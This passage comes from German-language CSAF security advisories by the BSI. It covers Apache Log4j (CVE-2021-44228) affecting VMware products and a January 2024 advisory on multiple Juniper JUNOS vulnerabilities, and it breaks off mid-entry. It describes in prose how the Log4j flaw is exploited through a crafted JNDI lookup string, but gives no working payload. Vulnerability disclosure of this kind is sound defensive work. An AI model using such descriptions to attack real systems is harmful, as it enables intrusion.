Workload", "product_id": "950382", "product_identification_helper": { "cpe": "cpe:/a:vmware:carbon_black_cloud_workload:-" } } }, { "category": "product_name", "name": "VMware Cloud Director Object Storage Extension", "product": { "name": "VMware Cloud Director Object Storage Extension", "product_id": "T021402", "product_identification_helper": { "cpe": "cpe:/a:vmware:cloud_director:object_storage_extension" } } }, { "category": "product_name", "name": "VMware Cloud Foundation", "product": { "name": "VMware Cloud Foundation", "product_id": "658718", "product_identification_helper": { "cpe": "cpe:/a:vmware:cloud_foundation:-" } } }, { "category": "product_name", "name": "VMware Horizon", "product": { "name": "VMware Horizon", "product_id": "T021252", 
"product_identification_helper": { "cpe": "cpe:/a:vmware:horizon:-" } } }, { "category": "product_name", "name": "VMware Identity Manager", "product": { "name": "VMware Identity Manager", "product_id": "T021253", "product_identification_helper": { "cpe": "cpe:/a:vmware:identity_manger:-" } } }, { "category": "product_name", "name": "VMware NSX Data Center for vSphere", "product": { "name": "VMware NSX Data Center for vSphere", "product_id": "393634", "product_identification_helper": { "cpe": "cpe:/a:vmware:nsx_data_center:-" } } }, { "category": "product_name", "name": "VMware SD-WAN by VeloCloud", "product": { "name": "VMware SD-WAN by VeloCloud", "product_id": "T021403", "product_identification_helper": { "cpe": "cpe:/a:vmware:sd-wan_by_velocloud:-" } } }, { "branches": [ { "category": "product_name", "name": "VMware Workspace One Access Connector", "product": { "name": "VMware Workspace One Access Connector", "product_id": "T021254", "product_identification_helper": { "cpe": "cpe:/a:vmware:workspace_one_access:::connector" } } }, { "category": "product_name", "name": "VMware Workspace One Access", "product": { "name": "VMware Workspace One Access", "product_id": "T021255", "product_identification_helper": { "cpe": "cpe:/a:vmware:workspace_one_access:-" } } } ], "category": "product_name", "name": "Workspace One Access" }, { "category": "product_name", "name": "VMware vCenter Server", "product": { "name": "VMware vCenter Server", "product_id": "T012302", "product_identification_helper": { "cpe": "cpe:/a:vmware:vcenter_server:-" } } }, { "category": "product_name", "name": "VMware vRealize Log Insight", "product": { "name": "VMware vRealize Log Insight", "product_id": "T021256", "product_identification_helper": { "cpe": "cpe:/a:vmware:vcenter_log_insight:-" } } }, { "branches": [ { "category": "product_name", "name": "VMware vRealize Operations", "product": { "name": "VMware vRealize Operations", "product_id": "T021257", "product_identification_helper": { "cpe": 
"cpe:/a:vmware:vrealize_operations:-" } } }, { "category": "product_name", "name": "VMware vRealize Operations Cloud Proxy", "product": { "name": "VMware vRealize Operations Cloud Proxy", "product_id": "T021404", "product_identification_helper": { "cpe": "cpe:/a:vmware:vrealize_operations:::cloud_proxy" } } } ], "category": "product_name", "name": "vRealize Operations" }, { "category": "product_name", "name": "VMware vRealize Suite Lifecycle Manager", "product": { "name": "VMware vRealize Suite Lifecycle Manager", "product_id": "T021258", "product_identification_helper": { "cpe": "cpe:/a:vmware:vrealize_suite_lifecycle_manager:-" } } } ], "category": "vendor", "name": "VMware" }, { "branches": [ { "category": "product_name", "name": "VMware Tanzu Spring Boot", "product": { "name": "VMware Tanzu Spring Boot", "product_id": "T021262", "product_identification_helper": { "cpe": "cpe:/a:vmware_tanzu:spring_boot:-" } } } ], "category": "vendor", "name": "VMware Tanzu" }, { "branches": [ { "category": "product_name", "name": "Wibu-Systems CodeMeter", "product": { "name": "Wibu-Systems CodeMeter", "product_id": "812997", "product_identification_helper": { "cpe": "cpe:/a:wibu:codemeter:-" } } } ], "category": "vendor", "name": "Wibu-Systems" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "notes": [ { "category": "description", "text": "Es existiert eine Schwachstelle in Apache log4j. Die Schwachstelle ist auf eine fehlende Bereinigung von Benutzereingaben zur\u00fcckzuf\u00fchren und ist mithilfe eines manipulierten Strings, welcher einen \"JNDI lookup\" besitzt, anzugreifen. Dadurch wird ein Request zu einem malizi\u00f6sen Server ausgel\u00f6st, der im JNDI lookup definiert ist. Wenn die Antwort einen Pfad zu einer schadhaften Java Klasse besitzt, wird diese in den Prozess des log4j Servers injiziert. Ein entfernter, anonymer Angreifer kann diese Schwachstelle z.B. 
durch das Senden eines manipulierten Headers ausnutzen, um beliebigen Programmcode auszuf\u00fchren." } ], "product_status": { "known_affected": [ "T001160", "T008876", "T008873", "T003343", "T016816", "T011128", "T008911", "T013661", "876876", "T021577", "398363", "950382", "393634", "T015711", "2040", "T021345", "642", "2951", "T019704", "T003522", "812997", "T016315", "T019995", "T021953", "T009185", "T021270", "T003085", "T014765", "T017100", "T019402", "T000126", "367115", "778219", "T009295", "915286", "T015887", "T015127", "T019293", "T015520", "T017032", "658718", "T021258", "1017", "T021257", "T014392", "T021256", "T021498", "T021251", "T021250", "T021255", "T021376", "T021254", "T021375", "T021496", "T021253", "T006099", "T021252", "69412", "T015519", "5198", "T015518", "T015517", "T015516", "T010062", "T023838", "T016960", "T018011", "T018253", "T013570", "668076", "T018014", "T015471", "T014381", "T021267", "T002207", "T018811", "1024", "T018812", "5104", "T021262", "T004181", "196088", "777623", "T021266", "T002044", "T021265", "T021264", "T021263", "5121", "67646", "T015823", "T015027", "T012790", "T021358", "T021357", "T021356", "T000612", "T021878", "T021359", "T005181", "T005180", "199167", "T011337", "T012302", "2143", "T016589", "T016984", "T021248", "T021402", "T021247", "T021401", "T021367", "T021245", "T021366", "T021404", "T021249", "T021403", "T021244", "T021242" ] }, "release_date": "2021-12-09T23:00:00.000+00:00", "title": "CVE-2021-44228" } ] }
wid-sec-w-2024-0064
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "JUNOS ist das \"Juniper Network Operating System\", das in Juniper Appliances verwendet wird.\r\nSRX Series Services Gateways ist ein Next-Generation Anti-Threat Firewall von Juniper.\r\nBei den Switches der Juniper EX-Serie handelt es sich um Access- und Aggregations-/Core-Layer-Switches.\r\nDie Switches der QFX-Serie von Juniper sichern und automatisieren Netzwerke in Rechenzentren. 
\r\nDie Juniper MX-Serie ist eine Produktfamilie von Routern.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, lokaler oder physischer Angreifer kann mehrere Schwachstellen in Juniper JUNOS, Juniper JUNOS Evolved, Juniper SRX Series, Juniper EX Series, Juniper QFX Series, Juniper ACX Series, Juniper PTX Series und Juniper MX Series ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren und seine Berechtigungen zu erweitern.", "title": "Angriff" }, { "category": "general", "text": "- BIOS/Firmware\n- Appliance", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2024-0064 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0064.json" }, { "category": "self", "summary": "WID-SEC-2024-0064 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0064" }, { "category": "external", "summary": "Juniper Security Advisory JSA11272 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA11272" }, { "category": "external", "summary": "Juniper Security Advisory JSA75233 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75233" }, { "category": "external", "summary": "Juniper Security Advisory JSA75721 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75721" }, { "category": "external", "summary": "Juniper Security Advisory JSA75723 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75723" }, { "category": "external", "summary": "Juniper Security Advisory JSA75725 vom 2024-01-10", 
"url": "https://supportportal.juniper.net/JSA75725" }, { "category": "external", "summary": "Juniper Security Advisory JSA75727 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75727" }, { "category": "external", "summary": "Juniper Security Advisory JSA75729 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75729" }, { "category": "external", "summary": "Juniper Security Advisory JSA75730 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75730" }, { "category": "external", "summary": "Juniper Security Advisory JSA75733 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75733" }, { "category": "external", "summary": "Juniper Security Advisory JSA75734 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75734" }, { "category": "external", "summary": "Juniper Security Advisory JSA75735 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75735" }, { "category": "external", "summary": "Juniper Security Advisory JSA75736 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75736" }, { "category": "external", "summary": "Juniper Security Advisory JSA75737 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75737" }, { "category": "external", "summary": "Juniper Security Advisory JSA75738 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75738" }, { "category": "external", "summary": "Juniper Security Advisory JSA75740 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75740" }, { "category": "external", "summary": "Juniper Security Advisory JSA75741 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75741" }, { "category": "external", "summary": "Juniper Security Advisory JSA75742 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75742" }, { "category": "external", "summary": "Juniper Security Advisory JSA75743 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75743" }, { "category": "external", "summary": "Juniper Security 
Advisory JSA75744 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75744" }, { "category": "external", "summary": "Juniper Security Advisory JSA75745 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75745" }, { "category": "external", "summary": "Juniper Security Advisory JSA75747 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75747" }, { "category": "external", "summary": "Juniper Security Advisory JSA75748 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75748" }, { "category": "external", "summary": "Juniper Security Advisory JSA75752 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75752" }, { "category": "external", "summary": "Juniper Security Advisory JSA75753 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75753" }, { "category": "external", "summary": "Juniper Security Advisory JSA75754 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75754" }, { "category": "external", "summary": "Juniper Security Advisory JSA75755 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75755" }, { "category": "external", "summary": "Juniper Security Advisory JSA75757 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75757" }, { "category": "external", "summary": "Juniper Security Advisory JSA75758 vom 2024-01-10", "url": "https://supportportal.juniper.net/JSA75758" } ], "source_lang": "en-US", "title": "Juniper Produkte: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-01-10T23:00:00.000+00:00", "generator": { "date": "2024-08-15T18:03:31.626+00:00", "engine": { "name": "BSI-WID", "version": "1.3.5" } }, "id": "WID-SEC-W-2024-0064", "initial_release_date": "2024-01-10T23:00:00.000+00:00", "revision_history": [ { "date": "2024-01-10T23:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": 
"Juniper EX Series", "product": { "name": "Juniper EX Series", "product_id": "T019811", "product_identification_helper": { "cpe": "cpe:/h:juniper:ex:-" } } }, { "category": "product_name", "name": "Juniper EX Series 4600", "product": { "name": "Juniper EX Series 4600", "product_id": "T021598", "product_identification_helper": { "cpe": "cpe:/h:juniper:ex:ex4600" } } }, { "category": "product_name", "name": "Juniper EX Series 4100", "product": { "name": "Juniper EX Series 4100", "product_id": "T030475", "product_identification_helper": { "cpe": "cpe:/h:juniper:ex:4100" } } }, { "category": "product_name", "name": "Juniper EX Series 4400", "product": { "name": "Juniper EX Series 4400", "product_id": "T030476", "product_identification_helper": { "cpe": "cpe:/h:juniper:ex:4400" } } }, { "category": "product_name", "name": "Juniper EX Series EX9200", "product": { "name": "Juniper EX Series EX9200", "product_id": "T031997", "product_identification_helper": { "cpe": "cpe:/h:juniper:ex:ex9200" } } } ], "category": "product_name", "name": "EX Series" }, { "branches": [ { "category": "product_name", "name": "Juniper JUNOS Evolved", "product": { "name": "Juniper JUNOS Evolved", "product_id": "T018886", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:evolved" } } }, { "category": "product_name", "name": "Juniper JUNOS PTX Series", "product": { "name": "Juniper JUNOS PTX Series", "product_id": "T023853", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:ptx_series" } } }, { "category": "product_name", "name": "Juniper JUNOS", "product": { "name": "Juniper JUNOS", "product_id": "T030471", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:-" } } }, { "category": "product_name", "name": "Juniper JUNOS ACX7024", "product": { "name": "Juniper JUNOS ACX7024", "product_id": "T031994", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:acx7024" } } }, { "category": "product_name", "name": "Juniper JUNOS ACX7100-32C", "product": { 
"name": "Juniper JUNOS ACX7100-32C", "product_id": "T031995", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:acx7100-32c" } } }, { "category": "product_name", "name": "Juniper JUNOS ACX7100-48L", "product": { "name": "Juniper JUNOS ACX7100-48L", "product_id": "T031996", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:acx7100-48l" } } } ], "category": "product_name", "name": "JUNOS" }, { "category": "product_name", "name": "Juniper MX Series", "product": { "name": "Juniper MX Series", "product_id": "918766", "product_identification_helper": { "cpe": "cpe:/h:juniper:mx:-" } } }, { "category": "product_name", "name": "Juniper QFX Series 5000", "product": { "name": "Juniper QFX Series 5000", "product_id": "T021597", "product_identification_helper": { "cpe": "cpe:/h:juniper:qfx:qfx5000" } } }, { "category": "product_name", "name": "Juniper SRX Series", "product": { "name": "Juniper SRX Series", "product_id": "T021593", "product_identification_helper": { "cpe": "cpe:/h:juniper:srx_service_gateways:-" } } } ], "category": "vendor", "name": "Juniper" } ] }, "vulnerabilities": [ { "cve": "CVE-2022-2964", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-2964" }, { "cve": "CVE-2022-2873", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-2873" }, { "cve": "CVE-2022-2795", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-2795" }, { "cve": "CVE-2022-2663", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-2663" }, { "cve": "CVE-2022-25265", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-25265" }, { "cve": "CVE-2022-23307", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-23307" }, { "cve": "CVE-2022-23305", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-23305" }, { "cve": "CVE-2022-23302", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-23302" }, { "cve": "CVE-2022-22942", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-22942" }, { "cve": "CVE-2022-2196", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-2196" }, { "cve": "CVE-2022-21699", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-21699" }, { "cve": "CVE-2022-20141", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
